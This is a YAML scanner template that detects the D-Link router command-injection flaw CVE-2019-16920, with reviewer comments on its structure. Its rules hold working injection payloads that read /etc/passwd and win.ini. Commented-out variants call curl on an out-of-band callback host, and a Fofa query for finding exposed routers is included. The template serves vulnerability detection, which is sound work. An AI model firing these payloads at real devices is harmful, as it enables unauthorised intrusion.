漏洞描述
Fofa app="D_Link-Router"
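---
# Scanner template for CVE-2019-16920 (D-Link routers).
# NOTE(review): the pasted copy had all indentation stripped, which makes
# every key top-level (info/set/rules would each parse as null). The nesting
# below is reconstructed from the key names and the commented-out rules.
id: CVE-2019-16920
info:
  name: D-Link Unauthenticated remote code
  author: JingLing(https://hackfun.org/)
  severity: critical
  verified: false
  # The description currently holds the Fofa fingerprint query rather than
  # a description of the issue; see the NVD reference for the advisory.
  description: |-
    Fofa app="D_Link-Router"
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-16920
    - https://mp.weixin.qq.com/s/8K5ucIKbcIUGJuGSkguoQg
  tags: cve,cve2019,dlink,unauthenticated,rce
  created: 2024/02/25
set:
  # oob / oobHTTP are only referenced by the disabled out-of-band rules below.
  oob: oob()
  oobHTTP: oob.HTTP
  # passwd / winini are not referenced by any active rule; r1 and r2 carry the
  # already-encoded command inline. Either reference them via {{passwd}} /
  # {{winini}} or drop them so the two copies cannot drift apart.
  passwd: urlencode("cat /etc/passwd")
  winini: urlencode("type C:\\Windows\\win.ini")
rules:
  # Disabled out-of-band variant of r0: confirms execution through a callback
  # to the OOB listener instead of by inspecting the response body.
  # r0:
  #   request:
  #     method: POST
  #     path: /apply_sec.cgi
  #     body: html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acurl%20{{oobHTTP}}
  #   expression: oob(oob, oob.ProtocolHTTP, 3)
  # r0: reachability probe against the login handler. The expression only
  # requires a 200, so on its own it shows the endpoint answers, not that the
  # device is affected; the top-level expression relies on r1/r2 for that.
  r0:
    request:
      method: POST
      path: /apply_sec.cgi
      body: html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384
    expression: response.status == 200
  # Disabled out-of-band variant of r1 (same callback-based confirmation).
  # r1:
  #   request:
  #     method: POST
  #     path: /apply_sec.cgi
  #     headers:
  #       Cookie: uid=1234123
  #     body: html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acurl%20{{oobHTTP}}
  #   expression: oob(oob, oob.ProtocolHTTP, 3)
  # r1: Linux firmware check. A match requires a 200 and a passwd-style
  # "root:x:0:0:" record in the response body.
  r1:
    request:
      method: POST
      path: /apply_sec.cgi
      headers:
        Cookie: uid=1234123
      body: html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat%20/etc/passwd
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
  # r2: Windows-hosted variant. A match requires a 200 and the
  # "for 16-bit app support" text that win.ini starts with.
  # NOTE(review): the body is a plain scalar, so the doubled backslashes are
  # sent literally (C:\\Windows\\win.ini); confirm that is intended, since the
  # winini variable above is written for an expression-level unescape instead.
  r2:
    request:
      method: POST
      path: /apply_sec.cgi
      headers:
        Cookie: uid=1234123
      body: html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0atype%20C:\\Windows\\win.ini
    expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
# Overall verdict: the login handler must answer (r0) and either the Linux
# (r1) or the Windows (r2) body signature must be present.
expression: r0() && (r1() || r2())
# Earlier, Linux-only verdict kept for reference:
# expression: r0() && r1()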